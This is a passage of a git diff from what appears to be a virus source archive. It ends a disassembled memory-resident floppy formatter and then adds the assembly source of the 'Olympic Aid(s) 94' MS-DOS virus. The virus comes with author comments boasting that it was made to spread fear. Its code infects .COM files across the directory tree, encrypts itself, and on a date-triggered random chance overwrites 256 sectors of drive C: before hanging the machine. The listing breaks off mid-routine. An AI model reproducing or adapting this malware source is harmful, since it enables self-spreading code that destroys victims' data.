stosw ; Store ax to es:[di] + stosw ; Store ax to es:[di] + mov ax,data_54 + stosw ; Store ax to es:[di] + mov data_100,di + inc data_95 + inc data_99 + retn + +; +; SUBROUTINE +; + +sub_54 proc near + mov word ptr data_98,0 + mov si,offset 139h + cld ; Clear direction +loc_230: + lodsb ; String [si] to al + mov cl,4 +loc_231: + mov ah,al + and ah,3 + cmp ah,3 + je loc_232 ; Jump if equal + cmp ah,0 + je loc_233 ; Jump if equal + mov bl,data_56 + call sub_57 + jmp short loc_233 + db 90h +loc_232: + mov bl,data_56 + shl bl,1 ; Shift w/zeros fill + call sub_57 +loc_233: + dec cl + jz loc_234 ; Jump if zero + shr al,1 ; Shift w/zeros fill + shr al,1 ; Shift w/zeros fill + jmp short loc_231 +loc_234: + cmp si,14Dh + jl loc_230 ; Jump if < + retn +sub_54 endp + + +; +; SUBROUTINE +; + +sub_55 proc near + push cx + mov al,byte ptr ds:[2423h] + cbw ; Convrt byte to word + mov bx,ax + mov al,data_53 + cbw ; Convrt byte to word + add ax,word ptr ds:[223h] + xor dx,dx ; Zero register + div bx ; ax,dx rem=dx:ax/reg + call sub_59 + xor dx,dx ; Zero register + mov bx,2 + div bx ; ax,dx rem=dx:ax/reg + call sub_58 + mov bx,3 + mul bx ; dx:ax = reg * ax + add ax,3 + add ax,cx + pop cx + retn +sub_55 endp + + +; +; SUBROUTINE +; + +sub_56 proc near + mov ah,data_95 + inc ah + call sub_47 + mov data_190,ax + retn +sub_56 endp + + +; +; SUBROUTINE +; + +sub_57 proc near + xor bh,bh ; Zero register + cmp data_56,9 + jne loc_235 ; Jump if not equal + clc ; Clear carry flag + rcr bx,1 ; Rotate thru carry + adc bx,0 +loc_235: + add word ptr data_98,bx + retn +sub_57 endp + + +; +; SUBROUTINE +; + +sub_58 proc near + cmp dx,0 + je loc_236 ; Jump if equal + mov cx,1 + retn +loc_236: + mov cx,dx + retn +sub_58 endp + + +; +; SUBROUTINE +; + +sub_59 proc near + test al,1 + jz loc_237 ; Jump if zero + mov word ptr ds:[229h],2 + retn +loc_237: + mov word ptr ds:[229h],0 + retn +sub_59 endp + + +; +; SUBROUTINE +; + +sub_60 proc near + mov di,offset 139h + xor al,al ; Zero register + mov cx,14h + cld ; Clear direction + repne stosb ; Rep zf=0+cx >0 Store al to es:[di] + retn +sub_60 endp + + +; +; SUBROUTINE +; + +sub_61 proc near + mov si,data_31 + mov bx,offset data_41 + mov al,[bx+si] + mov byte ptr ds:[2423h],al + mov bx,offset data_47 + mov al,[bx+si] + mov byte ptr ds:[242Bh],al + mov bx,offset data_39 + mov al,[bx+si] + mov data_71,al + mov bx,offset data_43 + mov al,[bx+si] + mov data_55,al + mov bx,offset data_44 + mov al,[bx+si] + mov data_56,al + and ax,0FFh + mov word ptr ds:[242Eh],ax + mov bx,offset data_45 + mov al,[bx+si] + mov data_57,al + mov bx,offset data_46 + mov al,[bx+si] + mov data_58,al + mov bx,offset data_52 + mov al,[bx+si] + mov data_53,al + shl si,1 ; Shift w/zeros fill + mov bx,offset data_48 + mov ax,[bx+si] + mov word ptr ds:[2427h],ax + mov bx,offset data_40 + mov ax,[bx+si] + mov data_61,ax + mov bx,offset data_37 + mov ax,[bx+si] + mov word ptr data_60,ax + mov bx,69h + mov ax,[bx+si] + mov word ptr ds:[2429h],ax + mov bx,offset data_50 + mov ax,[bx+si] + mov word ptr ds:[242Ch],ax + mov bx,offset data_51 + mov ax,[bx+si] + mov data_54,ax + mov ah,4 + int 1Ah ; Real time clock ah=func 04h + ; get date cx=year, dx=mon/day + mov word ptr ds:[243Fh],dx + cmp data_31,0 + jne loc_238 ; Jump if not equal + mov word ptr ds:[216h],143h + retn +loc_238: + mov word ptr ds:[216h],14Dh + retn +sub_61 endp + + jmp short loc_239 + nop + inc dx + inc si + dec di + push dx + dec bp + inc cx + push sp + and [bx+si],al + add al,[bx+si] + add [bx+si],ax + add al,[bx+si] + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add al,[bx+si] + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + sub [bx+si],ax + add [bx+si],al + add [bp+4Fh],cl + db ' NAME FAT12 ', 0Dh, 0Ah, ' ' + db 'Non-System Disk ...', 0Dh, 0Ah, ' ' + db 'Replace And Press Any Key When R' + db 'eady...', 0Dh, 0Ah, 0 +loc_239: + xor ax,ax ; Zero register + cli ; Disable interrupts + mov ss,ax + mov sp,7C00h + sti ; Enable interrupts + push cs + pop ds + mov si,data_234e + cld ; Clear direction +loc_240: + lodsb ; String [si] to al + test al,al + jz loc_241 ; Jump if zero + mov ah,0Eh + xor bx,bx ; Zero register + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode + jmp short loc_240 +loc_241: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + int 19h ; Bootstrap loader + db 347 dup (0) + db 55h,0AAh + +; +; SUBROUTINE +; + +sub_62 proc near + mov byte ptr ds:[22Fh],1 + mov ds,data_25 + mov al,0FFh + mov ds:dsk_motor_tmr_,al + mov al,ds:dsk_motor_stat_ + and al,0Fh + push cs + pop ds + cmp al,0 + je loc_242 ; Jump if equal + retn +loc_242: + mov cl,data_29 + mov al,10h + shl al,cl ; Shift w/zeros fill + mov ah,al + or al,cl + or al,0Ch + mov dx,3F2h + out dx,al ; port 3F2h, dsk0 contrl output + mov cl,4 + rol ah,cl ; Rotate + mov ds,data_25 + mov ds:dsk_motor_stat_,ah + push cs + pop ds + mov byte ptr ds:[22Dh],2 + call sub_7 + retn +sub_62 endp + + +; +; SUBROUTINE +; + +sub_63 proc near + pop ax + mov data_86,ax + call sub_62 + call sub_67 + jmp short loc_243 + db 90h + +; External Entry into Subroutine + +sub_64: + pop ax + mov data_86,ax + mov data_63,0 + call sub_62 + call sub_66 +loc_243: + call sub_79 + call sub_68 + jc loc_244 ; Jump if carry Set + jmp data_86 +loc_244: + clc ; Clear carry flag + jmp loc_123 +sub_63 endp + + +; +; SUBROUTINE +; + +sub_65 proc near + pop ax + mov data_88,ax + call sub_64 + test data_73,0C0h + jz loc_245 ; Jump if zero + call sub_64 + test data_73,0C0h + jz loc_245 ; Jump if zero + jmp loc_123 +loc_245: + mov al,data_65 + cmp data_31,0 + jne loc_246 ; Jump if not equal + shl al,1 ; Shift w/zeros fill +loc_246: + mov data_63,al + call sub_63 + jmp data_88 + +; External Entry into Subroutine + +sub_66: + mov ah,7 + call sub_71 + mov ah,data_29 + call sub_71 + retn +sub_65 endp + + +; +; SUBROUTINE +; + +sub_67 proc near + mov ah,0Fh + call sub_71 + mov ah,data_29 + call sub_71 + mov ah,data_63 + call sub_71 + retn +sub_67 endp + + +; +; SUBROUTINE +; + +sub_68 proc near + mov ah,8 + call sub_71 + call sub_70 + mov data_73,al + call sub_70 + mov data_72,al + retn +sub_68 endp + + +; +; SUBROUTINE +; + +sub_69 proc near + call sub_70 + mov data_73,al + call sub_70 + mov data_74,al + call sub_70 + mov data_75,al + call sub_70 + mov data_77,al + call sub_70 + mov data_78,al + call sub_70 + mov data_79,al + call sub_70 + mov data_80,al + retn +sub_69 endp + + +; +; SUBROUTINE +; + +sub_70 proc near + mov dx,3F4h + xor cx,cx ; Zero register + +locloop_247: + in al,dx ; port 3F4h, dsk0 cntrlr status + and al,0C0h + cmp al,0C0h + je loc_248 ; Jump if equal + loop locloop_247 ; Loop if cx > 0 + + pop ax + stc ; Set carry flag + retn +loc_248: + inc dx + in al,dx ; port 3F5h, dsk0 controlr data + clc ; Clear carry flag + retn +sub_70 endp + + +; +; SUBROUTINE +; + +sub_71 proc near + mov dx,3F4h + xor cx,cx ; Zero register + +locloop_249: + in al,dx ; port 3F4h, dsk0 cntrlr status + and al,0C0h + cmp al,80h + je loc_250 ; Jump if equal + loop locloop_249 ; Loop if cx > 0 + + pop ax + stc ; Set carry flag + retn +loc_250: + mov al,ah + inc dx + out dx,al ; port 3F5h, dsk0 controlr data + clc ; Clear carry flag + retn +sub_71 endp + + +; +; SUBROUTINE +; + +sub_72 proc near + mov dx,3F7h + mov al,data_71 + out dx,al ; port 3F7h ??I/O Non-standard + retn +sub_72 endp + + +; +; SUBROUTINE +; + +sub_73 proc near + mov al,2 + out 0Ch,al ; port 0Ch, DMA-1 clr byte ptr + jmp short $+2 ; delay for I/O + mov al,ah + out 0Bh,al ; port 0Bh, DMA-1 mode reg + mov bx,data_68 + push cs + pop ax + mov cl,4 + rol ax,cl ; Rotate + mov ch,al + and al,0F0h + add ax,bx + jnc loc_251 ; Jump if carry=0 + inc ch +loc_251: + out 4,al ; port 4, DMA-1 bas&add ch 2 + jmp short $+2 ; delay for I/O + mov al,ah + out 4,al ; port 4, DMA-1 bas&add ch 2 + jmp short $+2 ; delay for I/O + mov al,ch + and al,0Fh + out 81h,al ; port 81h, DMA page reg ch 2 + mov ax,data_67 + out 5,al ; port 5, DMA-1 bas&cnt ch 2 + jmp short $+2 ; delay for I/O + mov al,ah + out 5,al ; port 5, DMA-1 bas&cnt ch 2 + jmp short $+2 ; delay for I/O + mov al,2 + out 0Ah,al ; port 0Ah, DMA-1 mask reg bit + retn +sub_73 endp + + +; +; SUBROUTINE +; + +sub_74 proc near + pop ax + mov data_86,ax + mov data_68,28E9h + mov data_67,1FFh + mov data_69,46h ; 'F' + mov data_70,0E6h + call sub_62 + call sub_72 + mov ah,data_69 + call sub_73 + call sub_76 + jc loc_252 ; Jump if carry Set + call sub_79 + call sub_69 + jc loc_252 ; Jump if carry Set + jmp data_86 +loc_252: + clc ; Clear carry flag + call sub_7 + jmp loc_123 +sub_74 endp + + +; +; SUBROUTINE +; + +sub_75 proc near + pop ax + mov data_86,ax + call sub_62 + call sub_72 + mov ah,data_69 + call sub_73 + call data_85 + jc loc_253 ; Jump if carry Set + call sub_79 + call sub_69 + jc loc_253 ; Jump if carry Set + jmp data_86 +loc_253: + clc ; Clear carry flag + call sub_7 + jmp loc_123 +sub_75 endp + + +; +; SUBROUTINE +; + +sub_76 proc near + mov ah,data_70 + call sub_71 + mov ah,data_29 + cmp data_64,0 + je loc_254 ; Jump if equal + or ah,4 +loc_254: + call sub_71 + mov ah,data_65 + call sub_71 + mov ah,data_64 + call sub_71 + mov ah,data_66 + call sub_71 + mov ah,2 + call sub_71 + mov ah,data_56 + call sub_71 + mov ah,data_57 + call sub_71 + mov ah,0FFh + call sub_71 + retn +sub_76 endp + + mov ah,4Dh ; 'M' + call sub_71 + mov ah,data_29 + cmp data_64,0 + je loc_255 ; Jump if equal + or ah,4 +loc_255: + call sub_71 + mov ah,2 + call sub_71 + mov ah,data_56 + call sub_71 + mov ah,data_58 + call sub_71 + mov ah,data_59 + call sub_71 + retn + +; +; SUBROUTINE +; + +sub_77 proc near + mov ah,4 + call sub_71 + mov ah,data_29 + call sub_71 + call sub_70 + mov data_76,al + retn +sub_77 endp + + +; +; SUBROUTINE +; + +sub_78 proc near + pop ax + mov data_87,ax + call sub_48 + mov ax,data_61 + mov data_67,ax + mov data_68,14Dh + mov data_69,4Ah ; 'J' + mov data_85,2837h + call sub_75 + test data_73,0C0h + jnz loc_256 ; Jump if not zero + jmp data_87 +loc_256: + test data_74,2 + jz loc_257 ; Jump if zero + jmp loc_86 +loc_257: + cmp data_94,2 + jne loc_258 ; Jump if not equal + mov data_94,0 + jmp loc_93 +loc_258: + inc data_94 + call sub_65 + test data_73,0C0h + jnz loc_259 ; Jump if not zero + jmp data_82 +loc_259: + jmp loc_123 +sub_78 endp + + +; +; SUBROUTINE +; + +sub_79 proc near + mov cx,18h + +locloop_260: + call sub_7 + cmp byte ptr ds:[22Fh],0 + jne loc_261 ; Jump if not equal + retn +loc_261: + loop locloop_260 ; Loop if cx > 0 + + pop ax + jmp loc_123 +sub_79 endp + +data_214 db 0 +data_215 dw 0 + db 8 dup (0) +data_217 dw 0 + db 26 dup (0) +data_218 dw 0 +data_219 dw 0 + db 469 dup (0) +data_220 db 0 + db 154 dup (0) +data_221 db 0Dh, 0Ah, ' Mem Resident Format A' + db 'lready Installed', 0Dh, 0Ah, 'Al' + db 't + Left Shift + Right Shift Wil' + db 'l Activate', 0Dh, 0Ah, '$' +data_222 db 0Dh, 0Ah, 'Background Formatter I' + db 's Installed', 0Dh, 0Ah, 'Alt + L' + db 'eft Shift + Right Shift Will Act' + db 'ivate', 0Dh, 0Ah, '$' +data_223 db 0Dh, 0Ah, 'No Diskette Drive Conn' + db 'ect', 0Dh, 0Ah, 'Program Termina' + db 'ted !', 0Dh, 0Ah, '$' + db 'There Are ' +data_224 db 0 + db ' Diskette Drives Connected' + db 0 +data_225 db 0 + db 20h,0C4h + db 14 dup (0C4h) +data_227 db ' ', 0 + db 'Is This Configuration Correct ? ' + db '[Y]', 0 + db 'How Many Diskette Drives ( Not I' + db 'nclude Fixed Disk ) ?', 0 + db 'DRIVE ', 0 + db ' ( 0 - 360K, 1 - 1.2M, 2 - 720K,' + db ' 3 - 1.44M ) ?', 0 +loc_262: + push cs + pop ds + push cs + pop es + call sub_86 + mov word ptr ds:[1E2h],cs + mov word ptr ds:[1E4h],cs + mov word ptr ds:[1DAh],cs + mov word ptr ds:[1E0h],cs + mov word ptr data_24,0EBFEh + cli ; Disable interrupts + mov word ptr ds:[1E6h],ss + mov word ptr ds:[1E8h],sp + push cs + pop ss + mov sp,2B84h + mov ax,202h + push ax + push cs + mov ax,data_81 + push ax + mov word ptr ds:[1DCh],sp + mov ss,word ptr ds:[1E6h] + mov sp,word ptr ds:[1E8h] + sti ; Enable interrupts + call sub_80 + call sub_23 + call sub_88 + call sub_24 + mov al,0Eh + mov si,19Dh + mov dx,12CCh + call sub_87 + mov al,13h + mov si,1A1h + mov dx,12E6h + call sub_87 + mov al,9 + mov si,199h + mov dx,127Ah + call sub_87 + mov al,8 + mov si,195h + mov dx,11E0h + call sub_87 + mov dx,offset data_222 ; ('') + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + mov al,0 + mov dx,2B84h + mov cl,4 + shr dx,cl ; Shift w/zeros fill + add dx,11h + mov ah,31h ; '1' + int 21h ; DOS Services ah=function 31h + ; terminate & stay resident + ; al=return code,dx=paragraphs + +; +; SUBROUTINE +; + +sub_80 proc near + push es + mov es,cs:data_25 + mov dx,es:video_port_ + add dx,6 + mov cs:data_90,dx + pop es + int 11h ; Put equipment bits in ax + mov bh,al + and bh,30h ; '0' + mov data_91,0B800h + cmp bh,30h ; '0' + jne loc_263 ; Jump if not equal + mov data_91,0B000h +loc_263: + mov bh,al + and bh,1 + and ax,0C0h + shl ax,1 ; Shift w/zeros fill + shl ax,1 ; Shift w/zeros fill + add ah,bh + cmp ah,0 + jne loc_264 ; Jump if not equal + mov dx,offset data_223 ; ('') + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + jmp loc_277 +loc_264: + mov al,ah + cmp al,3 + jl loc_265 ; Jump if < + mov al,2 +loc_265: + mov data_28,al + or al,30h ; '0' + mov data_224,al + call sub_81 + retn + +; External Entry into Subroutine + +sub_81: + push ax + push es + push di + mov bx,0Dh + mov dx,0 +loc_266: + mov si,dx + push ax + push bx + push dx + mov ah,8 + int 13h ; Disk dl=drive a ah=func 08h + ; get drive parameters, bl=type + ; cx=cylinders, dh=max heads + ; es:di= ptr to drive table + jc loc_267 ; Jump if carry Set + mov al,bl + dec al + pop dx + pop bx + mov [bx+si],al + pop ax + dec ah + jz loc_268 ; Jump if zero + inc dx + jmp short loc_266 +loc_267: + add sp,6 +loc_268: + pop di + pop es + pop ax + retn + +; External Entry into Subroutine + +sub_82: + mov al,41h ; 'A' + mov dx,0C1Dh + mov di,0 + call sub_85 + retn + +; External Entry into Subroutine + +sub_83: + call sub_82 + call sub_84 + retn + +; External Entry into Subroutine + +sub_84: + mov al,42h ; 'B' + mov dx,0E1Dh + mov di,1 + call sub_85 + retn + +; External Entry into Subroutine + +sub_85: + mov data_225,al + mov si,2C8Bh + call sub_14 + mov al,[di+0Dh] + nop ;*ASM fixup - displacement + cbw ; Convrt byte to word + add ax,ax + mov si,ax + mov bx,offset data_32 + mov si,[bx+si] + call sub_15 + retn + +; External Entry into Subroutine + +sub_86: + mov ah,51h ; 'Q' + int 21h ; DOS Services ah=function 51h + ; get active PSP segment in bx + ;* undocumented function + mov data_231,bx + mov ax,300Eh + mov data_232,ax + xor ax,ax ; Zero register +loc_269: + mov ds,ax + xor si,si ; Zero register + cld ; Clear direction + lodsb ; String [si] to al + cmp al,4Dh ; 'M' + je loc_271 ; Jump if equal +loc_270: + push ds + pop ax + inc ax + jmp short loc_269 +loc_271: + push ds + mov si,data_3e + lodsw ; String [si] to ax + pop bx + add bx,ax + inc bx + jc loc_270 ; Jump if carry Set + cmp cs:data_231,bx + jb loc_270 ; Jump if below + push ds + mov ds,bx + cmp byte ptr ds:data_17e,4Dh ; 'M' + nop ;*ASM fixup - sign extn byte + je loc_272 ; Jump if equal + pop ds + jmp short loc_270 +loc_272: + mov di,cs:data_232 + push cs + pop es + mov bx,ds + pop ds + mov ax,ds + stosw ; Store ax to es:[di] + mov ax,bx + stosw ; Store ax to es:[di] + mov ds,bx +loc_273: + push ds + mov si,data_3e + lodsw ; String [si] to ax + pop bx + add bx,ax + inc bx + mov ax,bx + stosw ; Store ax to es:[di] + mov ds,bx + xor si,si ; Zero register + lodsb ; String [si] to al + cmp al,5Ah ; 'Z' + jne loc_273 ; Jump if not equal + xor ax,ax ; Zero register + stosw ; Store ax to es:[di] + push cs + pop ds + mov si,di + sub si,6 + lodsw ; String [si] to ax + mov data_26,ax + lodsw ; String [si] to ax + mov data_27,ax + mov si,offset data_233 +loc_274: + mov ax,[si] + cmp ax,0 + je loc_275 ; Jump if equal + mov es,ax + mov ax,es:data_2e + add ax,10h + mov es,ax + mov di,data_18e + cmp word ptr es:[di],0EBFEh + je loc_276 ; Jump if equal + add si,2 + jmp short loc_274 +loc_275: + push cs + pop es + retn +loc_276: + mov dx,offset data_221 ; ('') + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx +loc_277: + call sub_11 + mov ax,4C00h + int 21h ; DOS Services ah=function 4Ch + ; terminate with al=return code +sub_80 endp + + +; +; SUBROUTINE +; + +sub_87 proc near + push es + push ax + push si + push dx + mov ah,35h ; '5' + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + pop dx + pop si + pop ax + mov [si],bx + mov [si+2],es + mov ah,25h ; '%' + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop es + retn +sub_87 endp + + +; +; SUBROUTINE +; + +sub_88 proc near +loc_278: + call sub_19 + mov dh,8 + mov dl,17h + mov si,2C65h + call sub_14 + mov al,data_28 + cbw ; Convrt byte to word + dec al + mov di,ax + add di,di + mov bx,offset data_229 + call word ptr [bx+di] ;* + mov dh,12h + mov dl,18h + mov si,2C9Eh + call sub_14 + call sub_13 +loc_279: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp al,0Dh + je loc_ret_282 ; Jump if equal + cmp al,1Bh + jne loc_280 ; Jump if not equal + jmp short loc_ret_282 + db 90h +loc_280: + and al,0DFh + cmp al,59h ; 'Y' + je loc_ret_282 ; Jump if equal + cmp al,4Eh ; 'N' + je loc_281 ; Jump if equal + call sub_11 + jmp short loc_279 +loc_281: + call sub_89 + +loc_ret_282: + retn +sub_88 endp + + +; +; SUBROUTINE +; + +sub_89 proc near + call sub_19 + mov dh,12h + mov dl,0Eh + mov si,2CC2h + call sub_14 + call sub_13 +loc_283: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp al,31h ; '1' + jge loc_285 ; Jump if > or = +loc_284: + call sub_11 + jmp short loc_283 +loc_285: + cmp al,32h ; '2' + jg loc_284 ; Jump if > + mov data_224,al + and al,0Fh + mov data_28,al + cbw ; Convrt byte to word + push ax + mov dh,8 + mov dl,17h + mov si,2C65h + call sub_14 + mov al,41h ; 'A' + mov byte ptr data_227+62h,al ; ('') + xor di,di ; Zero register + mov bx,0Dh +loc_286: + mov dh,12h + mov dl,0Eh + mov si,2CF8h + call sub_14 + call sub_13 + mov al,33h ; '3' + mov data_102,al + mov data_89,2FCDh + call sub_16 + mov [bx+di],al + push bx + push di + shl di,1 ; Shift w/zeros fill + mov bx,offset data_229 + call word ptr [bx+di] ;* + pop di + pop bx + inc di + pop ax + cmp di,ax + je loc_287 ; Jump if equal + push ax + inc byte ptr data_227+62h ; ('') + jmp short loc_286 +loc_287: + pop ax + jmp loc_278 +sub_89 endp + +data_229 dw offset sub_82 +data_230 dw offset sub_83 +data_231 dw 0 +data_232 dw 0 +data_233 dw 100 dup (0) + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.aid(s).asm b/MSDOS/Virus.MSDOS.Unknown.aid(s).asm new file mode 100644 index 00000000..a9f4f438 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.aid(s).asm @@ -0,0 +1,542 @@ + ; VirusName: Olympic Aid(s) '94 + ; Origin : Norway + ; Author : The Penetrator + ; Date : 1/01/1994 + ; + ; Hopefully the Olympics at Lillehammer is over when you read this + ; shit.This virus was made only for creating fear, and some publicity. + ; + ; Anyway this is a new selfencrypting non-overwriting *.COM infector... + ; And YES, it may (and WILL) harm you. It's a 10% chanse for a Major + ; ScrewUp (NO ScrewUps before February the 12th. Just to give it some + ; time to spread) + ; + ; And I have to send some fuckings to Norman Data Defence Systems in + ; Drammen, Norway. They is fucking up the BBS scene here in Norway + ; right now! + ; // The Penetrator/NORWAY + ; ----------- + ; (Now follows Immortal Riot comments!); + ; This is the virus, WE got accused for writing, how silly! Anyhow + ; I picked this one up from a dude in Norway, and he told me that + ; I could include it in our magazine, or whatever. + ; + ; It's nothing fancy or something, but hey! it surely was easy + ; publicity!, too bad that the papers accused US for doing it.. + ; We didn't, this is just a contribution from our friends in Norway, + ; that we picked up AFTER we'd got the silly F-bull 2.11, and had to + ; investigate the situation. + ; + ; I've in this version recieved another ansi-screen to include, dunno + ; about the last one.. Anyhow, this is as The Penetrate said a non-ow + ; .COM infector. It searches the whole directory tree of files to + ; infect, thus making it slow when its spreads trough the drive. It's + ; also highly destructive (NM.NUKE.VCL.256.TRASH). Some code resembles + ; of VCL based code, but if you want to read more about it, just read + ; our article about VCL.Olympic also included in Insane Reality issue4. + ; + ; HAHA!, Norway, Sweden got 24 gold-medals from the Olympic.Games + ; (If the ice-hockey counts!!), just as I told you! Haha!, AND give + ; my best to Beate (can't you give girls REAL-names in Norway??). + ; + ; Thanks to All Norweigian contributors // The Unforgiven/Immortal Riot. + ; + ; ----------- + ; OLYMPIC AID(S) '94 + ; ----------- + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + + + ; -- JUST FOR FIRST TIME INSTALLING ----- + +main proc near + db 0E9h,00h,00h ; Near Jump + + ; -- S T A R T O F V I R I I ----- + +start: call find_offset ; Like a PUSH IP +find_offset: pop bp ; We love POP'ing + push bp ; and PUSH'ing + pop bp ; bp's + sub bp,offset find_offset ; Adjust for length of host + +GeneticChange: MOV byte ptr [BP+GeneticChange+4],001h ; + + call encrypt_decrypt ; Decrypt the virus + +start_of_code label near + + lea si,[bp + buffer] ; SI points to original start + mov di,0100h ; Push 0100h on to stack for + push di ; return to main program + movsw ; Copy the first two bytes + movsb ; Copy the third byte + + mov di,bp ; DI points to start of virus + + mov bp,sp ; BP points to stack + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer on stack + int 021h + + + mov cx,0005h ; Do X infections +search_loop: push cx ; Save CX + add byte ptr [DI+GeneticChange+4],001h ; Some BullShit!!! + call search_files ; Find and infect a file + pop cx ; Restore CX + loop search_loop ; Repeat until CX is 0 + + + ; -- CHECKING DATE/TIME FOR OLYMPIC START -- + +CheckDate: mov ah,2ah + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dh=month + ; dl=day, al=day-of-week 0=SUN + + cmp DH,2h ; February + jB NoFuckUp + cmp DL,12 ; The Olympics is starting + jB NoFuckUp ; the 12 th. + + mov ah,2Ch + int 21h ; DOS Services ah=function 2Ch + ; get time, cx=hrs/min, dx=sec + cmp DL,10 ; 10 % chanse for... + jA NoFuckUp + +Yeah: jmp OL1994 ; ScrewUp... + + + ; -- RETURN NICELY AND QUIET TO INFECTED FILE -- + +NoFuckUp: pop dx ; DX holds original DTA address + mov ah,01Ah ; DOS set DTA function + int 021h + + mov sp,bp ; Deallocate local buffer + + xor ax,ax ; + mov bx,ax ; + mov cx,ax ; + mov dx,ax ; Empty out the registers + mov si,ax ; + mov di,ax ; + mov bp,ax ; + + ret ; Return to original program +main endp + + +; -- LET'S LOOK AT THE OLYMPIC RINGS ---- + +OL1994: mov ah,0Fh ; BIOS get video mode function + int 010h + xor ah,ah ; BIOS set video mode function + int 010h ; (Clear Screen) + + lea si,[di + AnsiData] ; SI points to data + mov cx,AnsiEnd-AnsiData ; Data Length + + JCXZ Done + + xor di,di + mov ax,0b800h + mov es,ax + + MOV DX,DI ;Save X coordinate for later. + XOR AX,AX ;Set Current attributes. + CLD + +LOOPA: LODSB ;Get next character. + CMP AL,32 ;If a control character, jump. + JC ForeGround + STOSW ;Save letter on screen. +Next: LOOP LOOPA + JMP Short Done + +ForeGround: + CMP AL,16 ;If less than 16, then change the + JNC BackGround ;foreground color. Otherwise jump. + AND AH,0F0H ;Strip off old foreground. + OR AH,AL + JMP Next + +BackGround: + CMP AL,24 ;If less than 24, then change the + JZ NextLine ;background color. If exactly 24, + JNC FlashBitToggle ;then jump down to next line. + SUB AL,16 ;Otherwise jump to multiple output + ADD AL,AL ;routines. + ADD AL,AL + ADD AL,AL + ADD AL,AL + AND AH,8FH ;Strip off old background. + OR AH,AL + JMP Next + +NextLine: + ADD DX,160 ;If equal to 24, + MOV DI,DX ;then jump down to + JMP Next ;the next line. + +FlashBitToggle: + CMP AL,27 ;Does user want to toggle the blink + JC MultiOutput ;attribute? + JNZ Next + XOR AH,128 ;Done. + JMP Next + +MultiOutput: + CMP AL,25 ;Set Z flag if multi-space output. + MOV BX,CX ;Save main counter. + LODSB ;Get count of number of times + MOV CL,AL ;to display character. + MOV AL,32 + JZ StartOutput ;Jump here if displaying spaces. + LODSB ;Otherwise get character to use. + DEC BX ;Adjust main counter. + +StartOutput: + XOR CH,CH + INC CX + REP STOSW + MOV CX,BX + DEC CX ;Adjust main counter. + LOOPNZ LOOPA ;Loop if anything else to do... +Done: + + + ; -- HAAKON & KRISTIN SCREWS UP -------- + + +TrashHD: CLI ; Disable interrupts + mov ax,0002h ; DRIVE C: + mov cx,100h ; Sectors (100hex=256DEC!) + XOR DX,DX ; Clear DX (start with sector 0) + int 026h ; DOS absolute write interrupt +EndlessLoop: JMP EndlessLoop ; Boring...ehh??? + + + ; -- FIND FILES ------- + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,64 ; Allocate 64 bytes on stack + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 64] ; SI points to 64-byte buffer + int 021h + + mov ah,03Bh ; DOS change directory function + lea dx,[di + root] ; DX points to root directory + int 021h + + call traverse ; Start the traversal + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 64] ; DX points to old directory + int 021h + + mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller + +root db "\",0 ; Root directory +search_files endp + +traverse proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first function + mov cx,00010000b ; CX holds search attributes + lea dx,[di + all_files] ; DX points to "*.*" + int 021h + jc leave_traverse ; Leave if no files present + +check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? + jne another_dir ; If not, try again + cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? + je another_dir ;If so, keep going + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 98] ; DX points to new directory + int 021h + + call traverse ; Recursively call ourself + + pushf ; Save the flags + mov ah,03Bh ; DOS change directory function + lea dx,[di + up_dir] ; DX points to parent directory + int 021h + popf ; Restore the flags + + jnc done_searching ; If we infected then exit + +another_dir: mov ah,04Fh ; DOS find next function + int 021h + jnc check_dir ; If found check the file + +leave_traverse: + lea dx,[di + com_mask] ; DX points to "*.COM" + call find_files ; Try to infect a file +done_searching: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller + +up_dir db "..",0 ; Parent directory name +all_files db "*.*",0 ; Directories to search for +com_mask db "*.COM",0 ; Mask for all .COM files +traverse endp + + + ; -- FIND MORE FILES ------- + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! + jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp 